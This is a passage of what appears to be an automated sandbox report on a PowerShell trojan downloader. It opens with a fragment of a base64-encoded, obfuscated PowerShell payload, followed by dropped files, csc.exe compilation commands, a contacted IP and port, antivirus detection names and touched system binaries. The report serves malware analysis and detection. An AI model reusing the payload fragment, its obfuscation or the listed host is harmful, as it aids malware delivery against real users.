EEAZwBBAEMAUQBBAGMAdwBCADAAQQBIAEkAJwArACcAQQBaAFEAQgBoAEEARwAwAEEATABnAEIARwBBAEcAdwBBAGQAUQBCAHoAQQBHAGcAQQBLAEEAQQBwAEEAQQAnACsAJwAwAEEAQwBnAEIAOQBBAEQAcwBBAEQAUQAnACsAJwBBAEsAJwArACcAQQBBADAAQQBDAGcAQQBrAEEARwBNAEEAYgBBAEIAcABBAEcAVQBBAGIAZwBCADAAQQBDADQAQQBRAHcAQgBzAEEARwA4AEEAYwB3AEIAbABBAEMAZwBBAEsAUQBBAD0AJwApADsADQAKACAAIAAgACAAcwBgAFQAYABBAHIAYABUAC0AcwBMAEUARQBQACAALQBTAGUAYwBvAG4AZABzACAANgAwADAALgAwADsADQAKAH0A |
file | C:\Users\test22\AppData\Local\Temp\c0nnsbkt.dll |
file | C:\Users\test22\AppData\Local\Temp\w5n2hyfx.dll |
cmdline | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\w5n2hyfx.cmdline" |
cmdline | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\c0nnsbkt.cmdline" |
host | 34.64.143.34 |
file | c:\Users\test22\AppData\Local\Temp\CSC871B.tmp |
file | C:\Users\test22\AppData\Local\Temp\RES872B.tmp |
Bkav | W32.AIDetect.malware2 |
Alibaba | TrojanDownloader:Win32/PsDownload.b2df3262 |
ESET-NOD32 | a variant of Generik.KNMGHYR |
Paloalto | generic.ml |
Kaspersky | Trojan-Downloader.Win32.PsDownload.jpl |
Avast | Win32:Trojan-gen |
McAfee-GW-Edition | Artemis |
Sophos | Mal/Generic-S |
Ikarus | Trojan.SuspectCRC |
Avira | TR/Dldr.Agent.skkoc |
Cynet | Malicious (score: 99) |
AhnLab-V3 | Malware/Win.Generic.C4630742 |
McAfee | Artemis!DCBCD8C4FCDD |
Fortinet | W32/PsDownload.KNMGHYR!tr |
AVG | Win32:Trojan-gen |
parent_process | powershell.exe | martian_process | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\c0nnsbkt.cmdline" | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\w5n2hyfx.cmdline" |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
dead_host | 34.64.143.34:3000 |
dead_host | 192.168.56.102:49186 |